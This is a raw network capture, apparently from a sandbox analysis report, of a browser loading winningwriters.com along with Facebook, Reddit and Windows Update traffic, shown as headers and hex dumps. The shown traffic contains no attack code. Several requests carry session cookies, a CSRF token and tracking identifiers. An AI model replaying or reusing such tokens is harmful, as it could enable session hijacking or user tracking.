                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            106192.168.2.164983866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC923OUTGET /assets/js/responsiveslides.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:11 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "2e5e-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 11870
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:11 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:11 UTC7825INData Raw: 2f 2a 21 20 52 65 73 70 6f 6e 73 69 76 65 53 6c 69 64 65 73 2e 6a 73 20 76 31 2e 35 34 0a 20 2a 20 68 74 74 70 3a 2f 2f 72 65 73 70 6f 6e 73 69 76 65 73 6c 69 64 65 73 2e 63 6f 6d 0a 20 2a 20 68 74 74 70 3a 2f 2f 76 69 6c 6a 61 6d 69 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 2d 32 30 31 32 20 40 76 69 6c 6a 61 6d 69 73 0a 20 2a 20 41 76 61 69 6c 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 2f 2a 6a 73 6c 69 6e 74 20 62 72 6f 77 73 65 72 3a 20 74 72 75 65 2c 20 73 6c 6f 70 70 79 3a 20 74 72 75 65 2c 20 76 61 72 73 3a 20 74 72 75 65 2c 20 70 6c 75 73 70 6c 75 73 3a 20 74 72 75 65 2c 20 69 6e 64 65 6e 74 3a 20 32 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28
                                                                                                                                                                                            Data Ascii: /*! ResponsiveSlides.js v1.54 * http://responsiveslides.com * http://viljamis.com * * Copyright (c) 2011-2012 @viljamis * Available under the MIT license *//*jslint browser: true, sloppy: true, vars: true, plusplus: true, indent: 2 */(function (
                                                                                                                                                                                            2024-11-18 20:00:11 UTC4045INData Raw: 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6c 69 64 65 54 6f 28 69 64 78 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 77 61 69 74 54 69 6d 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 49 6e 69 74 20 63 79 63 6c 65 0a 20 20 20 20 20 20 20 20 20 20 73 74 61 72 74 43 79 63 6c 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 73 74 61 72 74 69 6e 67 20 63 79 63 6c 65 0a 20 20 20 20 20 20 20 20 72 65 73 74 61 72 74 43 79 63 6c 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 73 65 74 74 69 6e 67 73 2e 61 75 74 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 53 74 6f 70 0a
                                                                                                                                                                                            Data Ascii: } slideTo(idx); }, waitTime); }; // Init cycle startCycle(); } // Restarting cycle restartCycle = function () { if (settings.auto) { // Stop


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            107192.168.2.1649839157.240.253.354436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC709OUTGET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=FGET HTTP/1.1
                                                                                                                                                                                            Host: www.facebook.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7438711606055477815", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7438711606055477815"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                            2024-11-18 20:00:11 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                            Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                            2024-11-18 20:00:11 UTC1730INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            108192.168.2.1649842151.101.65.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC340OUTPOST /reports HTTP/1.1
                                                                                                                                                                                            Host: w3-reporting-nel.reddit.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                            Content-Type: application/reports+json
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC718OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 39 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 33 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 35 31 2e 31 30 31 2e 31 32 39 2e 31 34 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 6f 6b 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 62 2e 72 65 64 64 69 74 2e 63 6f 6d 2f 72 70 2e 67 69 66 3f
                                                                                                                                                                                            Data Ascii: [{"age":3,"body":{"elapsed_time":795,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":0.3,"server_ip":"151.101.129.140","status_code":200,"type":"ok"},"type":"network-error","url":"https://alb.reddit.com/rp.gif?
                                                                                                                                                                                            2024-11-18 20:00:11 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            server: snooserv
                                                                                                                                                                                            Access-Control-Allow-Origin: https://www.reddit.com
                                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type,Origin,X-origination-host,X-origination-path
                                                                                                                                                                                            Access-Control-Expose-Headers: *
                                                                                                                                                                                            Access-Control-Max-Age: 86400
                                                                                                                                                                                            Vary: Origin


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            109192.168.2.164984166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC923OUTGET /assets/images/lion-mobile.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:11 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:42 GMT
                                                                                                                                                                                            ETag: "b213-578fd677f2c80"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 45587
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:11 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:11 UTC7822INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 af 00 00 01 06 08 06 00 00 00 13 f6 c5 e7 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 70 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 31 20 36 34 2e 31 34 30 39 34 39 2c 20 32 30 31 30 2f 31 32 2f 30 37 2d 31 30 3a 35 37 3a 30 31 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<piTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 4c 0d e7 fc b2 b0 d0 39 6a 41 cd 69 88 32 c0 3c 05 86 0e 1d fa 62 bb 76 ed ba 03 8e ef 9d 62 73 e9 a5 97 4e 0e bf 73 43 96 65 cb 96 b5 78 f3 cd 37 ef 74 56 42 b1 62 c5 3e e5 1a 1b 29 ef 28 b3 bc 68 e8 ed 38 98 8b e2 c9 02 43 52 a9 e9 6c 19 00 e4 d7 31 47 ae 18 cc b6 4e 96 bd e3 8e 3b 9e 77 be 1a 66 ba 9c 29 91 26 1a 69 fa 05 bb 89 47 32 b2 11 04 58 f9 87 6e dd ba 5d a2 f9 46 df ae a4 e3 74 ff ec b3 cf ae e6 59 4b 1b 9b 15 f4 b7 dd 76 5b 1c 16 e3 97 35 d8 94 0f 38 70 0f a0 b7 fb c6 0b df 9d f3 fc f3 cf bf 85 34 28 26 31 28 cb 74 82 7d 7e 7f 63 a7 e1 19 92 49 10 96 01 c6 3e 50 bd 7a f5 ae 94 b5 31 cf fb 63 93 26 4d ee a2 2c 5f 26 ca 86 93 74 28 b4 5f 65 87 43 0d f5 38 7a 66 b0 dc fd 7e af bd f6 da 5f d2 fe 0c 99 59 e9 b2 95 81 7e b3 a8 9c 39 01 f3 54 84 09
                                                                                                                                                                                            Data Ascii: L9jAi2<bvbsNsCex7tVBb>)(h8CRl1GN;wf)&iG2Xn]FtYKv[58p4(&1(t}~cI>Pz1c&M,_&t(_eC8zf~_Y~9T
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 83 fd e4 9e 0f 38 28 d9 01 6e 5a 1c 84 1a 34 cc 40 87 8e ad c4 9b 6f be 39 72 4a 64 18 23 0b 3a 70 e6 d0 3a d2 66 83 aa 8f 65 60 2b de f8 2a ba ef 36 58 e2 77 a5 ed 19 62 c3 31 ec c1 6f cb 99 27 80 d9 3e 08 db e7 77 ee 18 12 21 83 5e 3e 4c fe 09 ce d4 73 7c 3f 92 46 fc 2b 1b e8 25 a1 fc 19 9c 99 00 bb 36 c0 ba 6c 47 bb 4e 83 cd 0e b9 ba 8e a0 56 4b f3 7f 26 9d 2a a7 ef 38 69 12 10 55 87 0d 3b d2 a1 8a 85 05 b4 75 66 9d 75 8d 76 7e b0 6d db b6 f7 85 1b d0 81 ef 75 66 0a 1a f8 73 87 88 5d a7 18 f0 7d 94 27 4f 9e b4 b6 b3 fa d5 ce 60 1d 1a 21 31 7b 4f e7 58 49 e2 f7 46 6f 74 d0 1c ce b6 3e 5d 40 f0 ce 3b ef ec 4f 67 78 30 2e 01 1e ff b4 1d 48 0a 53 be 01 30 26 55 ab 56 6d 02 a0 69 0d 10 f3 d3 00 07 30 ad e9 d4 72 32 af d1 05 a5 44 18 01 52 ff ca bc 3a 15 ea
                                                                                                                                                                                            Data Ascii: 8(nZ4@o9rJd#:p:fe`+*6Xwb1o'>w!^>Ls|?F+%6lGNVK&*8iU;ufuv~mufs]}'O`!1{OXIFot>]@;Ogx0.HS0&UVmi0r2DR:
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 3c 5d 6e f4 c2 c1 14 ad 92 69 ae e0 f0 6b a4 ec 45 3c d7 de df 0c 95 99 c2 47 0f b8 85 bf 35 ab 54 a9 92 22 30 67 98 4a ad 34 b0 21 03 8b 68 e2 04 a6 61 1e b3 90 ec 7d 36 08 37 3b c8 77 fb 71 16 ee c2 ec 35 c4 d9 b9 42 b3 0a b0 2e 93 51 d0 64 fd 35 0d 1b 36 6c 68 49 a1 8b f0 5d 55 d8 6c 02 3d 2e 3d ac b4 94 86 fd 46 a9 61 a6 fe c9 16 b6 73 d5 1a ae a5 8e ca 6e 78 cb 48 01 1d 49 c7 44 39 b3 dd 25 ec a9 9c 6f 60 a2 f7 d1 8e 93 f1 b6 27 9c d0 31 92 38 d0 e0 08 9b 43 c5 fc ce 64 a3 02 b2 21 1d b3 3d ef df 31 6f c3 a9 3f 3c eb 03 34 e8 b9 54 68 0a 18 e7 51 47 8b 00 d2 55 dc e7 31 7e b3 91 fb 14 b2 03 cb a6 c6 5f d5 a6 76 1c d9 30 6c 7b 6a 5d c9 94 fe 0d 8b dc c9 a2 7e 67 7d 85 3d dc b4 70 c1 03 57 7e 84 a4 24 d9 50 66 37 31 e6 c1 07 1f bc 03 60 7f 0d 53 1e e0
                                                                                                                                                                                            Data Ascii: <]nikE<G5T"0gJ4!ha}67;wq5B.Qd56lhI]Ul=.=FasnxHID9%o`'18Cd!=1o?<4ThQGU1~_v0l{j]~g}=pW~$Pf71`S
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 40 46 16 c0 ba de 40 0a 2b 7b 76 8b 63 71 bb e1 89 60 e8 47 8e 78 02 81 df 00 5c c0 6f dd 8a 54 00 b4 ac 32 b3 56 85 3d 01 1e 6b 15 68 20 67 09 02 ec 4e 33 c0 31 80 9a e3 ed 77 b6 15 4e 27 72 d2 6c ae a3 63 4e 08 fc 8d f4 7c 53 f4 4c 39 04 ca 2c 92 20 5f 49 43 e6 f0 24 09 c7 3a ef b1 3a c7 6a 75 88 ab 05 e0 d4 74 e6 30 cc 40 ba f9 f3 e7 93 48 fb 6b 8d 20 eb ff 88 f6 63 8a fb b5 d7 5e eb 28 e9 13 e5 70 b3 5e 38 a5 fb 4c ad fa 3f ce 1e be 34 97 a5 c0 22 40 fc 4a 1a 24 0d bd 9f cb 38 9a 35 7e fc f8 fa 1a a6 af 67 96 0a 16 f5 62 18 00 82 e1 c3 10 0d 40 9d 1c c6 9e 80 70 4b fe a9 d9 32 5e b8 9e f8 1d e7 c0 78 73 30 68 98 19 09 01 30 38 17 2f 8e 47 2e 38 c1 21 9b 3a bd 93 d8 0b dc f9 3d 32 c3 86 59 18 8b f7 54 47 f1 14 b2 e3 a4 39 2d 16 2c cc 7b 00 ce b4 34 1d
                                                                                                                                                                                            Data Ascii: @F@+{vcq`Gx\oT2V=kh gN31wN'rlcN|SL9, _IC$::jut0@Hk c^(p^8L?4"@J$85~gb@pK2^xs0h08/G.8!:=2YTG9-,{4
                                                                                                                                                                                            2024-11-18 20:00:12 UTC5765INData Raw: cc 3b c5 f6 6c b6 cc a2 11 a0 9a 18 79 9c 3a f6 0f 67 62 5f 7c b4 7b f7 ee bd 4d 9d b0 84 80 9a c1 81 46 60 5b 47 c9 01 b8 18 85 f8 b7 d1 f6 c8 07 bc 0e cc bc 61 bc a9 13 5f a5 3a 49 a7 ba f9 dd d6 3a a4 18 83 4d 80 2c 28 30 e6 af 59 b3 e6 8b 62 bd 0d 09 b8 b5 8e 0a a0 ef 8b 29 8a 90 05 9d 45 25 0c 77 62 c4 42 ea c0 7d 3a 76 ec b8 46 9a b5 d1 b9 5e 6f ce 9c 39 f7 ec d9 b3 e7 1a 1a 92 78 0c 34 1e 80 c5 40 73 16 1f 58 18 96 42 ef f2 f9 bd f7 de 1b 18 77 1c cb 16 74 e2 6f 25 45 dd 90 68 45 9d f9 61 24 8d 9e f9 2a 8d 04 fd 1d 27 8d 4d 93 32 b6 f2 c6 3f 9e 38 67 1a 11 1e 17 68 bf 82 59 39 d6 49 0b 19 55 90 47 7c e6 2d 50 3c a3 d3 13 38 a3 27 cf b9 7c f9 f2 ee 2b 57 ae 6c 18 01 ef 59 86 39 0d 89 77 68 98 ab 2f 80 6c 71 b8 22 86 3e 55 72 da f0 7d da 70 5e ff 6a
                                                                                                                                                                                            Data Ascii: ;ly:gb_|{MF`[Ga_:I:M,(0Yb)E%wbB}:vF^o9x4@sXBwto%EhEa$*'M2?8ghY9IUG|-P<8'|+WlY9wh/lq">Ur}p^j


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            110192.168.2.1649840172.202.163.200443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PWK4kk87hbNDodd&MD=PRszgUPh HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                            2024-11-18 20:00:11 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                            MS-CorrelationId: de108b64-5852-43f3-9983-a9916a2f1397
                                                                                                                                                                                            MS-RequestId: d3ab2c88-5cd9-4569-a707-081bc24cb6af
                                                                                                                                                                                            MS-CV: o4sJ4loJuESCzIeP.0
                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                            2024-11-18 20:00:11 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
